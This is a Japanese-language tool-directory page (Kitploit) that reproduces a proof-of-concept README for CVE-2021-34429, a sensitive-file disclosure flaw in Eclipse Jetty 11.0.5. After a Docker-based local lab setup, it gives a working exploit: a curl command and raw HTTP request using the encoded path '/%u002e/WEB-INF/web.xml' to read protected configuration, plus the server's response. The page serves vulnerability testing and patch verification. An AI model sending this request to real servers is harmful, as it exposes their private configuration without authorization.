Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2021-34429 — POC for CVE-2021-34429 - Eclipse Jetty 11.0.5 機密ファイル開示 | Kitploit
ツール/GitHubGitHub/coldfusionx/cve-2021-34429
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティ設定ミス
GitHubcoldfusionx/cve-2021-34429

CVE-2021-34429

POC for CVE-2021-34429 - Eclipse Jetty 11.0.5 機密ファイル開示

リポジトリを見る
624年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2021-34429

CVE-2021-34429 の PoC - Eclipse Jetty 11.0.5 機密ファイル開示

エンコードされたURIを使用してWEB-INFディレクトリ内のファイルにアクセスする

テスト環境のセットアップ

前提条件: システムにdockerとdocker-composeをインストールする

Debianベースのディストリビューション(例: Ubuntu, Kali Linuxなど)では、以下のコマンドを使用してください。

root@kitploit:~
apt install docker.io
apt install docker-compose

Windows、mac、およびその他のディストリビューションについては、以下のガイドを参照してください。

  • https://docs.docker.com/engine/install/
  • https://docs.docker.com/compose/install/

Eclipse Jetty 11.0.5 のインストール

  • リポジトリをクローンまたはダウンロードする
  • docker-compose up -d を実行する
  • Webサーバーが http://localhost:8080/ で起動して動作しているはずです。

ホーム

脆弱性テスト

http://localhost:8080/%u002e/WEB-INF/web.xml にGETリクエストを送信する

  • curl -v 'localhost:8080/%u002e/WEB-INF/web.xml'

Request

root@kitploit:~
GET /%u002e/WEB-INF/web.xml HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

root@kitploit:~
HTTP/1.1 200 OK
Connection: close
Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
Content-Type: application/xml
Accept-Ranges: bytes
Content-Length: 209
Server: Jetty(11.0.5)

<!DOCTYPE web-app PUBLIC
 "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
 "http://java.sun.com/dtd/web-app_2_3.dtd" >

<web-app>
<display-name>ColdFusionX - Web Application</display-name>
</web-app>

参考文献:

  • https://nvd.nist.gov/vuln/detail/CVE-2021-34429
  • https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
ツールをダウンロード